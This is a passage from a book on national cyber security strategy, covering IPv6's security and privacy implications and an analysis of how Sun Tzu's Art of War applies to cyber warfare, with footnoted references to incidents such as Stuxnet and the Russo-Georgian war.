from a technical discipline to a strategic concept. The growing power of the Internet, the rapid development of hacker tools and tactics, and clear-cut ex- amples from current events suggest that cyber attacks will play an increasingly important, and perhaps a lead role, in future international conflicts. Since the Estonia crisis in 2007, this trend shows no sign of slowing down: • in 2007, the Israeli military is reported to have conducted a cyber attack against Syrian air defense prior to its destruction of an alleged nuclear reactor;283 • in 2008, many analysts argued that the Russo-Georgian war demonstrated that there will be a close relationship between cyber and conventional opera- tions in all future military campaigns;284 • in 2009, during a time of domestic political crisis, hackers knocked the entire nation-state of Kyrgyzstan offline;285 and • in 2010, the Stuxnet worm was believed to be the most sophisticated piece of malware yet examined by public researchers and is widely assumed to have been written by a state sponsor.286 281 “The North Atlantic Treaty,”1949. 282 “NATO 2020...” 2010. 283 Fulghum et al, 2007. 284 “Overview...” 2009. 285 Keizer, 2009. 286 “Stuxnet...” 2010. 86 BIRTH OF A CONCEPT: STRATEGIC CYBER SECURITY Therefore, national security leadership has no choice but to dramatically increase its level of understanding of the technology, law, and ethics related to cyber attack and defense so that it can competently factor cyber conflict, terrorism and warfare into all stages of national security planning. Part III of this book will examine four strategies that nation-states are likely to adopt as they seek to mitigate the threat of cyber attacks and attempt to improve their national cyber defense posture. 87 Next Generation Internet: Is IPv6 the Answer? III. NATION-STATE CYBER ATTACK MITIGATION STRATEGIES Part II of this book examined the advent of cyber security as a strategic concept. Part III will evaluate four likely strategies that governments will employ to mitigate the cyber attack threat: the “next-generation” Internet Protocol version 6 (IPv6), an application of the world’s best military doctrine (Sun Tzu’s Art of War) to cyber war- fare, cyber attack deterrence, and cyber arms control. 5. NEXT GENERATION INTERNET: IS IPV6 THE ANSWER?287 First and foremost, governments will seek to reach a higher level of strategic cyber security through improved technology. And the most likely candidate to have an effect at the strategic level is a sleeping giant – the new “language” of networks, Internet Protocol version 6 (IPv6). In fact, due to its stellar number of viable computer addresses and its enhanced security features, many nations view IPv6 as crucial to their national security plans for the future. However, its high learning curve has led myriad government agencies and large businesses to miss deadlines for IPv6 compliance. A different perspective is offered by some human rights organizations, which fear that the “next-generation” Internet will have adverse effects on individual privacy and online anonymity. Regarding IPv6 security, a key point to understand is that, during the long transi- tion period from IPv4 to IPv6, hackers will be able to exploit vulnerabilities in both languages at once. IPv6 Address Space IPv4, the current language of the Internet, will run out of available IP addresses – or “space” from which one can connect to the Internet – in 2011. The address shortage is especially acute in the developing world, which connected to the Internet after most IP addresses had already been allocated or bought.288 287 This chapter was co-authored with Alexander Eisen. 288 Grossetete et al, 2008. 88 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES IPv6 decisively answers the need for more IP addresses. IPv4 has around four bil- lion, which seemed like a lot when the protocol was written in the early 1980s, but is insufficient today. IPv6, developed in the late 1990s, has 128-bit addresses, which create 340 undecillion IPs,289 or 50 octillion for every human on Earth.290 As an added bonus, IPv6 employs much more powerful IP “headers,” or internal management data, which allow for more advanced features and customization than with IPv4. IPv6 headers will be used to support “telematics,” the integrated use of telecommunications and informatics. Since IPv6 will allow practically everything, including common household appliances, to be connected to the Internet, its advo- cates argue that telematics will provide more convenient, economical, and entertain- ing lifestyles.291 Improved Security? But the most important aspect of IPv6 for this research is that it was designed to provide better security than IPv4.292 The goal was to build security into the protocol itself. Thirty years ago, IPv4 defeated more feature-rich rivals precisely because IP was a “dumb” protocol. It lacked sophistication, but was simple, resilient, and easy to implement and maintain. The problem was that IPv4’s lack of intrinsic security left it open to misuse. Today, a better network protocol is needed, both for size and for security. IPv6 offers clear security upgrades over IPv4. First, IPv6 is much more cryptography-friendly. A mechanism called IP Security (IPSec) is built directly into the protocol’s “code stack.” IPSec should reduce Internet users’ vulnerability to spoofing,293 illicit traffic sniffing294 and Man-in-the-Middle (MITM) attacks.295 IPv6 also offers end-to-end connectivity, which is afforded by the incredibly high number of IP addresses available. Since it is possible, in theory, to give anything an IP address, any two points on the Internet may communicate directly with each other. 289 Or 340,282,366,920,938,463,463,374,607,431,768,211,456 possible addresses. 290 An IPv4 address looks like this: 207.46.19.60. IPv6 is much longer: 2001:0db8:0000:0000:0000:00 00:1428:57ab (or, for short, 2001:0db8::1428:57ab). 291 Godara, 2010: The term telematics often refers to automation in automobiles, such as GPS navigation, hands-free cell phones, and automatic driving assistance systems. 292 Hagen, 2002. 293 Spoofing means impersonating another computer user or program. 294 Passively collecting network data, with or without appropriate approval. 295 This is when an attacker secretly controls both sides of a conversation. The victims think they are speaking with one another directly, for example, by email, when in fact they are not. 89 Next Generation Internet: Is IPv6 the Answer? These upgrades should have numerous follow-on benefits. For example, the astro- nomical number of IP addresses may mean that attackers will no longer be able to randomly “scan” the Internet to find their victims. In addition, the Internet should be more resistant to self-propagating worms.296 To improve strategic cyber security across the Internet, any successor to IPv4 should have a greater focus on structure and logic (e.g., Internet navigation, data packet routing, IP address allocation). Fortunately, with IPv6, this is the case. The Internet Engineering Task Force (IETF) created the first IPv6 Forum in 1999; today there are IPv6-specific Task Forces worldwide, which still have the opportunity to make tangible improvements in the next-generation protocol as it evolves. IPv6 Answers Some Questions, Creates Others In spite of these promising characteristics, it is unlikely that IPv6 will end cyber at- tacks in the future. Hackers have already demonstrated that IPv6 is not invulnerable to many traditional, IPv4 attack methods, including DoS,297 packet crafting,298 and MITM attacks.299 Vulnerabilities in software (operating systems, network services, web applications) will continue to exist, no matter which protocol they use.300 And perhaps most crucially, although IPSec is available, it is not required.301 As an analogy, the history of Public Key Infrastructure (PKI)302 does not bode well for IPv6. The high cost and resource-intensive nature of PKI pose challenges to most organizations, and in the future, the same dynamic could hamper the large-scale deployment of IPSec in IPv6. False identities are often assumed by stealing or creating fraudulent ID cards or other documents. Via the Internet, attackers will still attempt to use hacked comput- ers as “proxies” for nefarious activity, even in the IPv6 era. The case of Stuxnet has 296 Popoviciu et al, 2006. 297 E.g., Smurf6, Rsmurf6, Redir6, connection flooding, and stealing all available addresses. 298 This refers to manually creating network data packets instead of using default or existing network traffic characteristics. 299 Or “man-in-the-middle” attacks, e.g., Parasite6, Fake_router6. 300 In fact, the majority of attacks today may not involve eavesdropping on or manipulating the traffic on a network wire. A compromised application, for example, could exfiltrate stolen information equally well via either the IPv4 or the IPv6 code stack. 301 It is also important to note that the improved IP header still does not travel across the Internet en- crypted, but in the clear. 302 This refers to the management of digital certificates. PKI uses asymmetric cryptography to create an electronic identity. Internet services are increasingly using it, and this should lower the risk of identity theft, but Stuxnet has shown that PKI is not a silver bullet. 90 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES shown that, even with PKI safeguards, it is possible to steal digital identities that al- low a hacker to run computer code as if it were installed by a trustworthy company. And of course, the next-generation Internet will spawn next-generation attacks. For example, if IPv6 precludes network vulnerability scanning, hackers may increas- ingly target Certificate Authorities (CA) and Domain Name Servers (DNS). In fact, a successful compromise of a DNS server may be required for an attacker to acquire detailed knowledge of a target Local Area Network (LAN).303 The necessarily long transition period will provide its own set of challenges. The most important is that, as the world uses both IP languages at once, hackers will have an increased “attack surface.” There will simply be a higher number of vulner- abilities to exploit as computer security personnel are forced to defend a larger network space within their enterprise. The level of complexity will rise as system administrators manage more devices per enterprise, more network interface cards (NIC) per device, and more code “stacks” or data structures per NIC. Furthermore, some network data will be “native” or IPv6- only, but other IPv6 traffic will be “tunneled” or shuttled across the Internet within IPv4 carrier packets. Such a new and complex environment may allow some cyber attacks to slip through myriad cracks in cyber defense architecture. In fact, this may already be the case on countless networks, given that modern devices and operating systems are often IPv6-enabled by default. The opposite is true for computer network defense. For example, even in the latest version of the world’s most popular intrusion detection software, called “Snort,” IPv6 awareness is not enabled by default, but must be specifically turned on by a security analyst.304 The likely result is a serious blind spot in global network traffic analysis. Consider the “auto-configuration” aspect of IPv6. Its intended function is to ease and increase mobility through enhanced, ad hoc network associations. This appears to be an exciting part of the world’s future networking paradigm. However, auto- configuration would also seem to greatly complicate the task of tracking network- enabled devices that enter and leave enterprise boundaries. 303 If DNS attacks are successful in the IPv6 era, the overall trend toward client-side exploits – those which target the end user – should continue. 304 “SNORT Users Manual...” 2011. 91 Next Generation Internet: Is IPv6 the Answer? Privacy Concerns From a law enforcement and national security perspective, there is worldwide inter- est in the implications of IPv6 for online privacy and anonymity, which will have a tangible impact on relations between government and civil society. IPv6 security, specifically in the form of IPsec, contains a potential paradox. Users gain end-to-end connectivity with peers and acquire strong encryption to obscure the content of their communications, but the loss of Network Address Translation (NAT) means that it is easier for third parties to see who is communicating with whom. Even if an eavesdropper is not able to read encrypted content, “traffic analy- sis” – or the deduction of information content by analyzing communication patterns – should be easier than with IPv4. NAT allows multiple users to connect to the Internet from one IP address. It almost single-handedly saved IPv4 from address depletion for many years.305 Further, NAT provides Internet users with some “security through obscurity” by making IP ad- dresses temporary and not permanently associated with a human user. This charac- teristic offers a small but tangible amount of Internet privacy. Critics of NAT claim that it is labor-intensive, expensive, and unnecessary, but others worry that its loss will come at the expense of privacy. For example, Chinese Internet Society chairwoman Hu Qiheng told the New York Times in 2006 that “there is now anonymity for criminals on the Internet in China ... with the China Next Generation Internet project, we will give everyone a unique identity on the Internet.”306 The simple reasoning behind Qiheng’s thinking is that IPv6 could facilitate the direct association of a permanent IP address to a particular Internet user. For law enforce- ment, end-to-end connectivity may help to solve the vexing “attribution” problem of cyber attacks, in which hackers are able to remain anonymous. But human rights groups fear that governments will use this new power to quash political dissent. This open question is serious enough that, in the future, various national IPv6 im- plementations may be incongruous or even incompatible with one another, as differ- ent network configurations are used for different purposes. IPv6 “privacy extensions” were designed to address this problem by making it pos- sible for a user to acquire somewhat random, temporary IP addresses in order to surf the web with greater privacy and security. Only time will tell whether IPv6 privacy extensions work in practice. Since IPv6 is just now being broadly deployed, 305 IPv4’s lifespan was also extended by coding other aspects of IPv6, such as IPSec, into IPv4. 306 Crampton, 2006. 92 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES many of its advanced features have not been subjected to sufficient testing or secu- rity analysis.307 In 2011, it is still unknown whether the IPv6 era will favor attackers or defenders in cyberspace. In the long-run, it is possible that the new protocol’s benefits will be good for overall Internet security. However, it is a near certainty that the long transi- tion phase from IPv4 to IPv6 will be characterized by increased security risks. Uneven Worldwide Deployment Many governments are not waiting for this debate to be settled. In a network-centric world, future Internet technologies such as IPv6 cannot be ignored. A government’s ability to conduct national security-related operations may depend on them one day. Nations and businesses risk falling behind peers, competitors, and enemies. Thus, numerous governments have set deadlines for various levels of IPv6 compliance. In the United States, the Executive Branch Office of Management and Budget (OMB) mandated that U.S. government agencies be “IPv6 compliant” by June 30, 2008. However, compliance in this case had very limited goals.308 Furthermore, the OMB mandate was almost immediately contradicted by a U.S. Department of Commerce report advising that premature transition to IPv6 could lead to higher overall transi- tion costs and even reduced security. More recently, the first U.S. Chief Information Officer (CIO), Vivek Kundra, provided a more detailed government directive – public Internet services such as webmail and DNS must operationalize “native” or IPv6-only traffic by October 2012. Internal networks must do the same by 2014.309 Most American businesses feel no direct pressure to migrate to IPv6. The reason is that the U.S. is the original home of the Internet, so most American firms possess enough IP addresses to satisfy their needs. However, the largest software compa- nies, such as Microsoft, support IPv6 because it should reduce or even eliminate the costs associated with NAT, which can be significant for online gaming, instant mes- saging, file sharing, etc.310 Indeed, Microsoft made IPv6 the default Internet protocol for its Vista operating system, which was released in January 2007. 307 Barrera, 2010. 308 This referred only to the capability of an agency’s core computer networks to forward IPv6 traffic to its intended destination. 309 Montalbano, 2010. 310 Golding, 2006. 93 Next Generation Internet: Is IPv6 the Answer? China has made the most determined effort of any nation to transition to IPv6. Above all, the size of China’s population demands a huge increase in its number of IP addresses since China has only one IPv4 address for every four of its citizens. At the same time, China has held the world’s biggest single IPv6 demonstration to date. During the 2008 Summer Olympics in Beijing, everything from live television and data feeds to security and traffic control was streamed over one vast IPv6 net- work.311 The cutting edge nature of IPv6 gives China a good way to development its Intellectual Property (IP) base. The China Next Generation Internet (CNGI) and the China Education and Research Network (CERNET) are huge IPv6 projects that will influence the evolution of the Internet for years to come. However, the slow pace of popular IPv6 application development, which has helped to keep worldwide transi- tion sluggish, has disappointed Chinese Internet officials.312 Within the European Union (EU), an IPv6 Task Force has stated that the importance of the next-generation Internet “cannot be overestimated.” In 2008, the European Commission advised private companies and the public sector to make the switch by 2010 and committed €90 million to IPv6 research.313 But near the end of 2009, a survey found that less than 20% had done so and that a majority of respondents feared its immediate financial costs.314 On the bright side, numerous European com- panies have made commercial contributions to IPv6 development. Ericsson built the world’s first IPv6 router in 1995, and an IPv6 concept car was jointly developed by Cisco and Renault. Nonetheless, European companies have complained that further incentives from Brussels are needed to ensure a smooth transition.315 In Japan, the need for increased address space is similar to China’s, but the reason is not population size. It stems from the desire to connect billions of electronic gad- gets to the Internet. The Japanese government has assured its country a leadership role in IPv6 deployment by offering tax breaks to companies that switch to IPv6. Its importance is emphasized in political speeches at the highest level of government316 and by initiatives such as “eJapan 2005,” in which IPv6 was given prominent sta- tus. NTT, the largest telecommunications provider in Japan, has offered commercial IPv6 services since 2001, and the University of Tokyo has held both the IPv4 and IPv6 “World Speed” records simultaneously. As in China, however, both the public 311 “Renumbering...” 2011. 312 Geers & Eisen, 2007. 313 Meller, 2008. 314 Kirk, 2009. 315 Geers & Eisen, 2007. 316 Essex, 2008. 94 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES and private sectors are still waiting for more IPv6 applications, even while they are attempting to future-proof their infrastructure.317 Differences of Opinion Remain While there are obvious business opportunities in IPv6, governments are also keen- ly interested in the strategic cyber security ramifications of the next-generation Internet. The loss of NAT will lower the cost of Internet connectivity and provide the foundation for improved communications worldwide, but it may also allow gov- ernments to monitor their Internet space – at least via traffic analysis – with much greater ease. As an international project, IPv6 will both benefit and suffer from significant differ- ences of approach and opinion. In Asia, citizens are more comfortable with govern- ment oversight than in the West. In Europe, Internet users are highly motivated to protect online anonymity. However, the U.S. is somewhere in the middle – personal information is jealously guarded, but the public is sympathetic to the needs of law enforcement. In order to make the IPv6 era fairer than with IPv4, the Internet Assigned Numbers Authority (IANA) has published these guidelines: • every address should be unique; • every address should be in an accessible registry database; • distribution should be aggregated, efficient, and hierarchical; • there should be no “stockpiling” of unused addresses; and • all potential members of the Internet community should have equal access. Another factor is the “IPv6 Ready Logo,” which is awarded to software and hardware that meets internationally-recognized technical standards. However, this initiative has already revealed the politically charged atmosphere surrounding IPv6. For ex- ample, China successfully argued against the direct inclusion of IPSec in the Logo award criteria, a seemingly small victory that could have enormous implications for privacy, anonymity, and security on the web for years to come. It remains an open question whether the U.S. and the EU should have pushed China harder during these negotiations. However, like China they must worry that IPsec will make life too hard for law enforcement.318 317 Geers & Eisen, 2007. 318 Geers & Eisen, 2007. 95 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? 6. SUN TZU: CAN OUR BEST MILITARY DOCTRINE ENCOMPASS CYBER WAR? Cyberspace is a new warfare domain. Computers and the information they contain are prizes to be won during any military conflict. But the intangible nature of cy- berspace can make victory, defeat, and battle damage difficult to calculate. Military leaders today are looking for a way to understand and manage this new threat to national security. The most influential military treatise in history is Sun Tzu’s Art of War. Its recommendations are flexible and have been adapted to new circumstances for over 2,500 years. This chapter examines whether Art of War is flexible enough to encompass cyber warfare. It concludes that Sun Tzu provides a useful but far from perfect framework for the management of cyber war and urges modern military strategists to consider the distinctive aspects of the cyber battlefield. What is Cyber Warfare? The Internet, in a technical sense, is merely a large collection of networked comput- ers. Humans, however, have grown dependent on “cyberspace” – the flow of infor- mation and ideas that they receive from the Internet on a continual basis and im- mediately incorporate into their lives. As our dependence upon the Internet grows, what hackers think of as their potential “attack surface” expands. The governance of national security and international conflict is no different: political and military ad- versaries now routinely use and abuse computers in support of strategic and tactical objectives. In the early 1980s, Soviet thinkers referred to this as the Military Tech- nological Revolution (MTR); following the 1991 Gulf War, the Pentagon’s Revolution in Military Affairs (RMA) was practically a household term.319 Cyber attacks first and foremost exploit the power and reach of the Internet. For example, since the earliest days of the Web, Chechen rebels have demonstrated the power of Internet-enabled propaganda.320 Second, cyber attacks exploit the Inter- net’s vulnerability. In 2007, Syrian air defense was reportedly disabled by a cyber attack moments before the Israeli Air Force demolished an alleged Syrian nuclear re- actor.321 Third, cyber attackers benefit from a degree of anonymity. During the 1999 war over Kosovo, unknown hackers tried to disrupt NATO military operations and were able to claim minor victories.322 Fourth, even a nation-state can be targeted. In 2009, the whole of Kyrgyzstan was knocked offline during a time of domestic politi- 319 Mishra, 2003. 320 Goble, 1999. 321 Fulghum et al, 2007. 322 Geers, 2008. 96 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES cal crisis.323 This list could be lengthened to include cyber warfare’s high return on investment, an attacker’s plausible deniability, the immaturity of cyber defense as a discipline, the increased importance of non-state actors in the Internet era, and more. Cyber attacks are best understood as an extraordinary means to a wide variety of ends: espionage, financial damage, and even the manipulation of national critical infrastructures. They can influence the course of conflict between governments, between citizens, and between government and civil society. What is Art of War? Modern military doctrine draws from a deep well of philosophy that spans political, economic, and scientific revolutions. The oldest and most profound treatise is Sun Tzu’s Military Strategy, known as Art of War (孫子兵法). Much of our current un- derstanding of military concepts such as grand strategy, center of gravity, decisive point, and commander’s intent can be traced to this book.324 According to Chinese tradition, Art of War was written by Sun Wu (now Tzu) in the 6th century B.C. and is one of China’s Seven Military Classics. Some scholars argue that gaps in logic and anachronisms in the text point to multiple authors, and they further contend that Art of War is a compilation of different texts that were brought together over time. Nonetheless, the book has an internal consistency that implies it is the product of one school of military thought. Art of War was translated for the West by a French missionary in 1782 and may have had an influence on the battle- field victories of Napoleon, who was likely familiar with its contents.325 Art of War has survived for 2,500 years because its advice is not only compelling, but concise, easy to understand, and flexible. Sun Tzu does not give military leaders a concrete plan of action, but a series of recommendations that can be adapted to new circumstances. Sun Tzu’s concepts have been successfully applied to disciplines other than warfare, including sports, social relationships, and business.326 There are thirteen chapters in Art of War, each dedicated to a particular facet of warfare. This chapter highlights at least one topical passage from each chapter and will argue that Sun Tzu provides a workable but not a perfect framework for the management of cyber war. 323 Keizer, 2009. 324 Van Riper, 2006. 325 Ralph D. Sawyer, Sun Tzu: Art of War (Oxford: Westview Press, 1994) 79, 127. 326 Ibid, 15. 97 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? Strategic Thinking Art of War opens with a warning: The Art of War is of vital importance to the State. It is a matter of life and death, a road either to safety or to ruin. Hence it is a subject of inquiry which can on no account be neglected. AoW: I. Laying Plans327 At the strategic level, a leader must take the steps necessary to prevent political coercion by a foreign power and to prevent a surprise military attack.328 Regard- ing offensive military operations, Art of War states that they are justified only in response to a direct threat to the nation; economic considerations, for example, are insufficient.329 Cyberspace is such a new arena of conflict that basic defense and attack strategies are still unclear. There have been no major wars (yet) between modern, cyber-capa- ble adversaries. Further, cyber warfare tactics are highly technical by nature, often accessible only to subject matter experts. As with terrorism, hackers have found success in pure media hype. As with Weapons of Mass Destruction (WMD), it is challenging to retaliate against an asymmetric threat. Attack attribution is the most vexing question of all – if the attacker can remain anonymous, defense strategies ap- pear doomed from the start. Finally, the sensitive nature of cyber warfare capabili- ties and methods has inhibited international discussion on the subject and greatly increased the amount of guesswork required by national security planners. The grace period for uncertainty may be running out. Modern militaries, like the governments and economies they protect, are increasingly reliant on IT infrastruc- ture. In 2010, the United States Air Force procured more unmanned than manned aircraft for the first time.330 IT investment on this scale necessarily means an in- creased mission dependence on IT. As adversaries look for their opponent’s Achilles heel, IT systems will be attractive targets. It is likely that the ground fighting of fu- ture wars will be accompanied by a parallel, mostly invisible battle of wits between state-sponsored hackers over the IT infrastructure that is required to wage war at all. Celebrated Red Team exercises, such as the U.S. Department of Defense’s Eligible Receiver in 1997, suggest that cyber attacks are potentially powerful weapons. Dur- 327 All Sun Tzu quotes are from Sun Tzu, Art of War (Project Gutenberg eBook, 1994, translated by Lionel Giles, 1910). 328 Sawyer, 1994. 329 Ibid. 330 Orton, 2009. 98 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES ing the exercise, simulated North Korean hackers, using a variety of hacker and information warfare tactics including the transmission of fabricated military orders and news reports, “managed to infect the human command-and-control system with a paralyzing level of mistrust .... As a result, nobody in the chain of command, from the president on down, could believe anything.”331 Because cyber warfare is unconventional and asymmetric warfare, nations weak in conventional military power are likely to invest in it as a way to offset conventional disadvantages. Good hacker software is easier to obtain than a tank or a rifle. Intel- ligence officials such as former CIA Director James Woolsey warn that even terrorist groups will possess cyber weapons of strategic significance in the next few years.332 Some analysts argue persuasively that the threat from cyber warfare is overstat- ed.333 However, national security planners cannot afford to underestimate its po- tential. A general rule could be that, as dependence on IT and the Internet grows, governments should make proportional investments in network security, incident response, technical training, and international collaboration. In the near term, international security dialogue must update familiar vocabulary, such as attack, defense, deterrence and escalation, to encompass post-IT Revolu- tion realities. The process that began nearly thirty years ago with MTR and RMA continues with the NATO Network Enabled Capability (NNEC), China’s Unrestricted Warfare, and the creation of U.S. Cyber Command. However, the word cyber still does not appear in NATO’s current Strategic Concept (1999), so there remains much work to be done. A major challenge with IT technology is that it changes so quickly it is difficult to follow – let alone master – all of the latest developments. From a historical perspective, it is tempting to think cyber warfare could have a positive impact on human conflict. For example, Sun Tzu advised military command- ers to avoid unnecessary destruction of adversary infrastructure. In the practical Art of War, the best thing of all is to take the enemy’s country whole and intact; to shatter and destroy it is not so good. So, too, it is better to recapture an army entire than to destroy it, to capture a regiment, a detachment or a company entire than to destroy them. AoW: III. Attack by Stratagem If cyber attacks play a lead role in future wars, and the nature of the fight is largely over IT infrastructure, it is conceivable that international conflicts will be shorter 331 Adams, 2001. 332 Aitoro, 2009. 333 Two are Cambridge University Professor Ross Anderson and Wired Threat Level Editor Kevin Poulsen. 99 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? and cost fewer lives. A cyber-only victory could facilitate economic recovery and post-war diplomacy. Such an achievement would please Sun Tzu, who argued that the best leaders can attain victory before combat is even necessary.334 Hence to fight and conquer in all your battles is not supreme excellence; supreme excellence consists in breaking the enemy’s resistance without fighting. AoW: III. At- tack by Stratagem But there is no guarantee that the increased use of cyber warfare will lead to less human suffering during international conflicts. If national critical infrastructures, such as water or electricity, are damaged for any period of time, what caused the outage will make little difference to those affected. Military leaders are specifically worried that cyber attacks could have unforeseen “cascading” effects that would inadvertently lead to civilian casualties, violate the Geneva Convention and bring war crimes charges.335 The anonymous nature of cyber attacks also leads to the dis- turbing possibility of unknown and therefore undeterred hackers targeting critical infrastructures during a time of peace for purely terrorist purposes. Cultivating Success Due to the remarkable achievements of cyber crime and cyber espionage,336 as well as plenty of media hype, cyber warfare will be viewed by military commanders as both a threat and an opportunity. But the most eloquent passages from Art of War relate to building a solid defense, and this is where a cyber commander must begin. The Art of War teaches us to rely not on the likelihood of the enemy’s not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable. AoW: VIII. Variation in Tactics Sun Tzu advises commanders not to rely on the good intentions of others or to count on best-case scenarios.337 In cyberspace, this is sound advice; computers are attacked from the moment they connect to the Internet.338 Cyber attackers currently have numerous advantages over defenders, including worldwide connectivity, vul- 334 Sawyer, 1994. 335 Graham, 1999. 336 “Espionage Report...” 2007; Cody, 2007. 337 Sawyer, 1994. 338 Skoudis, 2006. 100 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES nerable network infrastructure, poor attacker attribution, and the ability to choose their time and place of attack. Defenders are not without resources. They own what should be the most power- ful asset in the battle – home-field advantage, and they must begin to use it more wisely. Defenders have indigenous “super-user” rights throughout the network, and they can change hardware and software configurations at will. They can build re- dundancy into their operations and implement out-of-band cross-checking of impor- tant information. Such tactics are essential because cyber attack methods evolve so quickly that static, predictable defenses are doomed to fail. A primary goal should be to create a unique environment that an attacker has never seen before. This will require imagination, creativity, and the use of deception. Hence that general is skillful in attack whose opponent does not know what to defend; and he is skillful in defense whose opponent does not know what to attack. AoW: VI. Weak Points and Strong Adversary cyber reconnaissance should be made as difficult as possible. Adversar- ies must have to work hard for their intelligence, and they should doubt that the information they were able to steal is accurate. Attackers should be forced to lose time, wander into digital traps, and betray information regarding their identity and intentions. Thus one who is skillful at keeping the enemy on the move maintains deceitful ap- pearances, according to which the enemy will act. He sacrifices something that the enemy may snatch at it. By holding out baits, he keeps him on the march; then with a body of picked men he lies in wait for him. AoW: V. Energy As in athletics, cyber warfare tactics are often related to leverage. In an effort to gain the upper hand, both attackers and defenders attempt to dive deeper than their opponent into files, applications, operating systems, compilers, and hardware. Strategic attacks even target future technologies at their source – the research and development networks of software companies or personnel working in the defense industry. The general who is skilled in defense hides in the most secret recesses of the earth... AoW: IV. Tactical Dispositions In fact, professional hacker tools and tactics are stealthy enough that a wise system administrator should presume some level of system breach at all times. Defenses should be designed on the assumption that there is always a digital spy somewhere in the camp. 101 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? One of the first challenges in cyber warfare is simply to know if you are under at- tack. Therefore, a good short-term cyber defense goal is to improve an organization’s ability to collect, evaluate, and transmit digital evidence. If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle. AoW: III. Attack by Stratagem In the late 1990s, Moonlight Maze, the “largest cyber-intelligence investigation ever,” uncovered wide-ranging attacks targeting U.S. technical research, government contracts, encryption techniques, and war-planning data. Despite years of effort, law enforcement was able to find “disturbingly few clues” to help determine attribu- tion.339 And because cyber warfare is a new phenomenon that changes so quickly, it is difficult even for law enforcement officers to be sure they are operating within the constraints of the law. A long-term national objective should be the creation of a Distant Early Warning Line for cyber war. National security threats, such as propaganda, espionage, and attacks on critical infrastructure, have not changed, but they are now Internet-en- abled. Adversaries have a new delivery mechanism that can increase the speed, diffusion, and even the power of an attack. Thus, what enables the wise sovereign and the good general to strike and conquer, and achieve things beyond the reach of ordinary men, is foreknowledge. AoW: XIII. The Use of Spies Because IT security is a highly technical discipline, a broader organizational support structure must be built around it. To understand the capabilities and intentions of potential adversaries, such an effort must incorporate the analysis of both cyber and non-cyber data points. Geopolitical knowledge is critical. Whenever international tension is high, cyber defenders must now take their posts. In today’s Middle East, it is safe to assume that cyber attacks will always accompany the conflict on the ground. For example, in 2006 as fighting broke out between Israel and Gaza, pro- Palestinian hackers denied service to around 700 Israeli Internet domains.340 Information collection and evaluation were so important to Sun Tzu that the entire final chapter of Art of War is devoted to espionage. Spies are called the “sovereign’s 339 Adams, 2001: Russian telephone numbers were eventually associated with the hacks, but the U.S. was unable to gain further attribution. 340 Stoil & Goldstein, 2006. 102 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES most precious faculty” and espionage a “divine manipulation of the threads.” The cost of spying, when compared to combat operations, is said to be so low that it is the “height of inhumanity” to ignore it. Such a commander is “no leader of men, no present help to his sovereign, no master of victory.”341 In the wars of the future, brains will beat brawn with increasing frequency. Fol- lowing the IT Revolution, the need for investment in human capital has risen dra- matically. However, cyber defense is still an immature discipline, and it is difficult to retain personnel with highly marketable training. To gain a long-term competitive advantage, a nation must invest in science and technology as a national priority.342 Objective Calculations Sun Tzu warns that a commander must exhaustively and dispassionately analyze all available information. Offensive operations in particular should wait until a decisive victory is expected. If objective calculations yield an unfavorable result, the inferior party must assume a defensive posture until circumstances have changed in its favor.343 Now the general who wins a battle makes many calculations in his temple ere the battle is fought. The general who loses a battle makes but few calculations before- hand. Thus do many calculations lead to victory, and few calculations to defeat: how much more no calculation at all! It is by attention to this point that I can foresee who is likely to win or lose. AoW: I. Laying Plans In any conflict, there are prevailing environmental and situational factors over which the combatants have little control. Art of War lists over three dozen such factors to evaluate, including offense/defense, orthodox/unorthodox, rested/exhausted, dry/ wet, and confident/afraid.344 Most of these will have direct or indirect parallels in cyberspace. In cyberspace, reliable calculations are extremely difficult to perform. First and fore- most, cyber attackers possess enough advantages over defenders that there is an enormous gap in Return-on-Investment (RoI) between them. The cost of conducting a cyber attack is cheap, and there is little penalty for failure. Network reconnais- sance can be conducted, without fear of retaliation, until a suitable vulnerability is found. Once an adversary system is compromised and exploited, there are often im- 341 Sun Tzu, Art of War: “XIII. The Use of Spies.” 342 Rarick, 1996. 343 Sawyer, 1994. 344 Ibid. 103 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? mediate rewards. By comparison, cyber defense is expensive and challenging, and there is no tangible RoI. Another aspect of cyberspace that makes calculation difficult is its constantly changing nature. The Internet is a purely artificial construct that is modified contin- ually from across the globe. Cyber reconnaissance and intelligence collection are of reliable valuable to a military commander only for a short period of time. The geog- raphy of cyberspace changes without warning, and software updates and network reconfiguration create an environment where insurmountable obstacles and golden opportunities can appear and disappear as if by magic. The terrestrial equivalent could only be a catastrophic event such as an earthquake or an unexpected snow- storm. Art of War describes six types of battlefield terrain, ranging from “accessible,” which can be freely traversed by both sides, to “narrow passes,” which must either be strongly garrisoned or avoided altogether (unless the adversary has failed to fortify them).345 Although they will change over time, cyber equivalents for each Art of War terrain type are easily found in Internet, intranet, firewall, etc. The natural formation of the country is the soldier’s best ally; but a power of estimat- ing the adversary, of controlling the forces of victory, and of shrewdly calculating difficulties, dangers and distances, constitutes the test of a great general. AoW: X. Terrain Cyberspace possesses characteristics that the Art of War framework does not en- compass. For example, in cyberspace the terrestrial distance between adversaries can be completely irrelevant. If “connectivity” exists between two computers, attacks can be launched at any time from anywhere in the world, and they can strike their targets instantly. There is no easily defined “front line;” civilian and military zones on the Internet often share the same space, and military networks typically rely on civilian infrastructure to operate. With such amazing access to an adversary, never before in history has superior logic – not physical size or strength – more often de- termined the victor in conflict. Similar to cyber geography, cyber weapons also have unreliable characteristics. Some attacks that hackers expect to succeed fail, and vice versa. Exploits may work on one, but not another, apparently similar target. Exploits that work in one instance may never work again. Thus, it can be impossible to know if a planned cyber attack will succeed until the moment it is launched. Cyber weapons should be considered single-use weapons because defenders can reverse-engineer them to defend their 345 Sun Tzu, Art of War: “X. 